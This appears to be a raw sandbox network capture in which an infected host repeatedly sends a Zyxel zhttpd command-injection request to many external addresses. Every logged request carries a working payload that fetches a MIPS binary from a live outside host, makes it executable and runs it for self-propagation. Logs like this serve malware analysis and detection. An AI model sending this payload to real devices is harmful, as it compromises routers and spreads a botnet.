                                              Jan 29, 2024 07:03:39.798405886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1858192.168.2.1440290165.230.130.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798439980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1859192.168.2.145375643.66.2.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798491955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1860192.168.2.145785478.37.142.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798546076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1861192.168.2.1442908132.19.58.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798587084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1862192.168.2.1455662142.164.16.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798613071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1863192.168.2.1437814154.159.34.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798646927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1864192.168.2.1444658142.30.30.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798682928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1865192.168.2.144685438.56.90.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798710108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1866192.168.2.1432852218.234.129.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798780918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1867192.168.2.145191858.187.45.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798794031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1868192.168.2.1450560166.175.186.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798835993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1869192.168.2.145273847.254.150.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798860073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1870192.168.2.143416831.61.23.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798917055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1871192.168.2.1441178163.128.171.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798955917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1872192.168.2.1439454204.176.100.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798989058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1873192.168.2.1445236222.240.105.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799035072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1874192.168.2.1437324199.129.217.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799060106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1875192.168.2.145687248.72.114.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799113035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1876192.168.2.1436276175.161.160.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799154043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1877192.168.2.1441548104.16.214.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799189091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1878192.168.2.1434678185.192.82.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799246073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1879192.168.2.144362283.13.238.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799285889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1880192.168.2.146086095.159.38.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799314022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1881192.168.2.1449026123.254.102.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799371958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1882192.168.2.14409001.86.64.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799401999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1883192.168.2.1436986114.254.239.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799437046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1884192.168.2.1448122150.124.227.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799484015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1885192.168.2.1434340135.152.9.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799535990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1886192.168.2.1460146205.76.197.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799576044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1887192.168.2.143986865.180.163.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799598932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1888192.168.2.1460582213.198.173.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799637079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1889192.168.2.144196448.133.193.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799668074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1890192.168.2.1442070128.207.94.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799715996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1891192.168.2.1460892123.67.181.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799756050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1892192.168.2.144603447.194.155.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799799919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1893192.168.2.1438040185.66.247.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799845934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1894192.168.2.1439582171.58.220.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799895048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1895192.168.2.1456104222.236.159.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799945116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1896192.168.2.1452002181.111.53.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.799978018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1897192.168.2.1453930223.24.157.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800007105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1898192.168.2.14385549.186.182.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800041914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1899192.168.2.143374848.127.244.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800093889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1900192.168.2.1441618137.103.112.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800121069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1901192.168.2.14329922.79.215.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800164938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1902192.168.2.1447890221.36.49.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800199986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1903192.168.2.1435576145.61.122.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800226927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1904192.168.2.1442300193.63.138.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800252914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1905192.168.2.1433258158.23.56.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800286055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1906192.168.2.1446050217.159.151.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800329924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1907192.168.2.1434942166.134.164.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800354004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1908192.168.2.1438690138.9.167.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800416946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1909192.168.2.1443264155.17.148.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800457001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1910192.168.2.144121253.178.15.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800493002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1911192.168.2.1454002163.45.72.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800530910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1912192.168.2.1438598198.170.12.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800561905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1913192.168.2.1454134143.165.22.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800596952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1914192.168.2.143388860.60.91.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800645113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1915192.168.2.1436946134.117.215.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800683975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1916192.168.2.1460268135.49.174.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800724030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1917192.168.2.1459062192.33.155.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800776958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1918192.168.2.1447650180.121.52.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800816059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1919192.168.2.1437252188.231.77.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800852060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1920192.168.2.144873269.22.22.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.800904989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1921192.168.2.1443896166.224.202.151443
                                              TimestampBytes transferredDirectionData
